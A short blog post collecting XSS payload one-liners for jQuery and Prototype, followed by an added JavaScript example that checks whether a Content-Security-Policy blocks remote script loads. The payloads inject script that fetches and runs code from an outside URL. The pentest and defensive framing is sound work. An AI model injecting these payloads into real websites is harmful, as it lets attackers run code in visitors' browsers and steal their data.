JavaScript Frameworks – Your XSS Buddy
Lately there have been a lot of cases where I have needed a small way to bootstrap some remote JavaScript to demonstrate XSS exploitability to website stakeholders. Many sites now use popular JavaScript frameworks to assist with site functionality. These frameworks also work well for injection attacks, so why not abuse what is already loaded on the client side?
Side Note: Limiting field length for input validation can mean the difference between a theoretical vulnerability and an exploitable vulnerability. (No, alert('xss') is not a demonstration of exploitability.)
jQuery: (33 characters)
$.getScript('http://tr.im/xXXx');
Prototype: (70 characters)
$$("head")[0].insert(new Element("script",{src:'http://tr.im/xXXx'}));
I would like to continue to add to the collection if anybody has quick one-liners that I can add for other frameworks.
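From the defender's side, both one-liners above make the browser fetch a script from a foreign origin, which is what a Content-Security-Policy `script-src` directive restricts. The following is an added example (not from the original post): a simplified evaluator that checks whether a given policy would allow that load. The two policies and the `https://shop.example` origin are constructed, and nonces, hashes, ports and paths are not modelled.

```javascript
// Added example: simplified CSP script-src check (scheme and host sources only).
// Constructed sample values; REMOTE_SCRIPT is the URL used in the post's one-liners.
const PAGE_ORIGIN = 'https://shop.example';
const REMOTE_SCRIPT = 'http://tr.im/xXXx';
const WEAK_CSP = "default-src 'self'; script-src 'self' http: https:";
const HARDENED_CSP = "default-src 'self'; script-src 'self' https://cdn.example";

// Split a policy into { directive: [sources] }; the first occurrence of a directive wins.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in policy)) policy[key] = sources;
  }
  return policy;
}

// Does one source expression permit this script URL?
function sourceMatches(expr, url, pageOrigin) {
  const e = expr.toLowerCase();
  if (e === "'self'") return url.origin === pageOrigin;
  if (e.startsWith("'")) return false; // 'none', nonces, hashes: never match a URL here
  if (e === '*') return url.protocol === 'http:' || url.protocol === 'https:';
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return url.protocol === e; // scheme-source
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/);    // host-source
  if (!m) return false;
  const [, scheme, host] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
  return url.hostname === host;
}

// True if the policy lets the page load scriptUrl; script-src falls back to default-src.
function scriptLoadAllowed(cspHeader, scriptUrl, pageOrigin) {
  const policy = parseCsp(cspHeader);
  const sources = policy['script-src'] || policy['default-src'];
  if (!sources) return true; // no governing directive, so nothing is restricted
  const url = new URL(scriptUrl, pageOrigin);
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

for (const [label, csp] of [['weak', WEAK_CSP], ['hardened', HARDENED_CSP]]) {
  console.log(label, 'policy allows remote script:',
    scriptLoadAllowed(csp, REMOTE_SCRIPT, PAGE_ORIGIN));
}
```

A policy that lists bare schemes such as `http:` or `https:` in `script-src` still permits the remote load, while one restricted to `'self'` and a named host does not.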
